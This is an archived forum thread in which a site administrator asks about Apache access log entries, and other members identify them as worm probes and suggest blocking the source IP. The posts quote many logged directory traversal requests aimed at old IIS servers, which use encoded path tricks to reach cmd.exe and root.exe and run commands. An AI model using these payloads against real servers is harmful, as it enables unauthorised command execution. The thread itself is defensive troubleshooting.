SunQuest
           Server Administration
 
Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
User Name:
Password:
Remember me
Go Back   Codewalkers ForumsOther TechnologiesServer Administration

Reply
Add This Thread To:
  Del.icio.us   Digg   Google   Spurl   Blink   Furl   Simpy   Y! MyWeb 
Thread Tools Search this Thread Rate Thread Display Modes
 
Unread Codewalkers Forums Sponsor:
AT&T devCentral & BlackBerry(r) Webcast Series: BlackBerry and GPS -Build Location Awareness into your BlackBerry Applications, July 10th-1:00PM EST. Register Today!
  #1  
Old February 24th, 2004, 03:42 PM
kbenwa kbenwa is offline
Codewalkers Newbie (0 - 499 posts)
 
Join Date: Apr 2007
Posts: 48 kbenwa User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: < 1 sec
Reputation Power: 2
Access log file.

I looked in my access log file and found this

62.220.119.12 - - [24/Feb/2004:02:19:35 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:37 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:39 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
62.220.119.12 - - [24/Feb/2004:02:19:40 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

Has anyone seen this before, i am using Apache server. I see that there are some files that have 404 (error) but 400 what does that mean. Could someone please lend a helping hand on this.

Thank You
Kevin

Reply With Quote
  #2  
Old February 24th, 2004, 03:46 PM
tkarkkainen's Avatar
tkarkkainen tkarkkainen is offline
Moderator
Click here for more information
 
Join Date: Apr 2007
Location: Finland
Posts: 2,320 tkarkkainen User rank is Lance Corporal (50 - 100 Reputation Level)tkarkkainen User rank is Lance Corporal (50 - 100 Reputation Level)tkarkkainen User rank is Lance Corporal (50 - 100 Reputation Level)  Folding Points: 10700 Folding Title: Novice Folder
Time spent in forums: 6 Days 8 h 45 m 33 sec
Reputation Power: 4
RE: Access log file.

400 means bad request.

Reply With Quote
  #3  
Old February 24th, 2004, 03:51 PM
kbenwa kbenwa is offline
Codewalkers Newbie (0 - 499 posts)
 
Join Date: Apr 2007
Posts: 48 kbenwa User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: < 1 sec
Reputation Power: 2
RE: Access log file.

Ok what more information would you need, maybe it was something i was doing on here, have been working on getting mySql to work right. Not sure why this is in access log. I here is everything that is in log

62.220.119.12 - - [24/Feb/2004:02:19:05 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
62.220.119.12 - - [24/Feb/2004:02:19:06 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
62.220.119.12 - - [24/Feb/2004:02:19:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
62.220.119.12 - - [24/Feb/2004:02:19:13 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
62.220.119.12 - - [24/Feb/2004:02:19:15 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
62.220.119.12 - - [24/Feb/2004:02:19:20 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
62.220.119.12 - - [24/Feb/2004:02:19:22 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
62.220.119.12 - - [24/Feb/2004:02:19:23 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
62.220.119.12 - - [24/Feb/2004:02:19:25 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:30 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:33 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:35 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:37 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:39 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
62.220.119.12 - - [24/Feb/2004:02:19:40 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
As you can see by the times all within minutes or seconds of each other.

Reply With Quote
  #4  
Old February 24th, 2004, 04:08 PM
tkarkkainen's Avatar
tkarkkainen tkarkkainen is offline
Moderator
Click here for more information
 
Join Date: Apr 2007
Location: Finland
Posts: 2,320 tkarkkainen User rank is Lance Corporal (50 - 100 Reputation Level)tkarkkainen User rank is Lance Corporal (50 - 100 Reputation Level)tkarkkainen User rank is Lance Corporal (50 - 100 Reputation Level)  Folding Points: 10700 Folding Title: Novice Folder
Time spent in forums: 6 Days 8 h 45 m 33 sec
Reputation Power: 4
RE: Access log file.

Is this the access log or the error log? I see nothing but error messages in the file.

I picked two lines from the log:
Code:
62.220.119.12 - - [24/Feb/2004:02:19:37 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:39 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310


The not found error comes because the requested file couldn't be found. But notice the difference in the GET request. 404 is produced with ..%25%35%63 and 400 comes when the request was %%35c (notice the two %-charactersm although I'm not sure if those are the source of the error.)

The real source of the error might also be on the software that makes the GET request, in other words the browser. I'm no guru at HTTP, so I'll leave this for someone more experienced.

Reply With Quote
  #5  
Old February 25th, 2004, 01:49 AM
postalcow postalcow is offline
Codewalkers Beginner (1000 - 1499 posts)
 
Join Date: Apr 2007
Location: Ford CIty, PA USA
Posts: 1,267 postalcow User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: < 1 sec
Reputation Power: 3
Send a message via Yahoo to postalcow
RE: Access log file.

What that is - is Microsoft worms accessing your server to try an propagate.

Reply With Quote
  #6  
Old February 25th, 2004, 10:52 PM
bearqst bearqst is offline
Codewalkers Newbie (0 - 499 posts)
 
Join Date: Apr 2007
Location: Alaska
Posts: 153 bearqst User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: 20 m 47 sec
Reputation Power: 2
RE: Access log file.

Quote:
62.220.119.12 - - [24/Feb/2004:02:19:35 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293


Is this the only IP, its from a block from Tehran, Iran and as noted, quite possible a virus. I'd block the IP at your firewall and any others with similar log actipns.

Reply With Quote
Reply

Viewing: Codewalkers ForumsOther TechnologiesServer Administration > Access log file.


Thread Tools  Search this Thread 
Search this Thread:

Advanced Search
Display Modes  Rate This Thread 
Rate This Thread:


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
View Your Warnings | New Posts | Latest News | Latest Threads | Shoutbox
Forum Jump


Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
  
 

IBM developerWorks




© 2003-2008 by Developer Shed. All rights reserved. DS Cluster 2 hosted by Hostway